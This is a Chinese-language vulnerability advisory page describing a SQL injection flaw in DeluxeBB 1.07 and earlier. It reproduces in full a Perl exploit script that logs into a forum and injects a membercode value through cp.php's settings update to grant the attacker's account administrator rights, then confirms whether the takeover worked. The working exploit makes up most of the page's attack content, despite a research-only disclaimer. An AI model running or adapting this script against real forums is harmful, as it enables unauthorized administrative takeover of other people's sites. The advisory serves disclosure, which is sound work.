首页 -> 安全研究

安全研究

安全漏洞
DeluxeBB cp.php远程SQL注入漏洞

发布日期:2006-06-23
更新日期:2006-06-26

受影响系统:
DeluxeBB DeluxeBB <= 1.07
描述:
BUGTRAQ  ID: 18648

DeluxeBB是一款基于PHP的论坛程序。

DeluxeBB对用户请求的处理存在输入验证漏洞,远程攻击者可能利用此漏洞对服务执行SQL注入攻击,导致非授权访问控制数据库,获取服务的管理用户权限。

DeluxeBB的用户控制面板cp.php脚本中存在SQL注入漏洞,允许用户通过在升级设置中注入查询更改访问级别,获得管理权限。

<*来源:Hessam-x (Hessamx@Hessamx.net
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115134338726438&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
# DeluxeBB <= 1.07 Create Admin Exploit
#
## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net
# ./2006-6-25
### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;


$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;

print q(
###########################################################
#          DeluxeBB <= 1.07 Create Admin Exploit          #
#           www.hackerz.ir - www.h4ckerz.com              #
################### Coded By Hessam-x #####################

);



if (@ARGV < 3) {
print " #  usage : hx.pl [host&path] [uname] [pass]\n";
print " #  E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n";
  exit();
}

  
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";



# Login In DeluxeBB <= 1.07 Create Admin Exploit

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'misc.php',
Content => [
"sub" => "login",
"name" => "$uname",
"password" => "$passwd",
"submit" => "Log-in",
"redirect" => "",
"expiry" => "990090909",
],);

  if($cookie_jar->as_string =~ /memberpw=(.*?);/) {
  print "successfully .\n";
  } else {
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n";
  print $cookie_jar->as_string;
  exit();
  }

  # Creat Admin :)

$req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12&invisiblebrowse=0&markposts=15&submit=Update');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin Cp/) {
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }

# milw0rm.com [2006-06-25]

建议:
厂商补丁:

DeluxeBB
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.deluxebb.com/

浏览次数:3590
严重程度:10(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障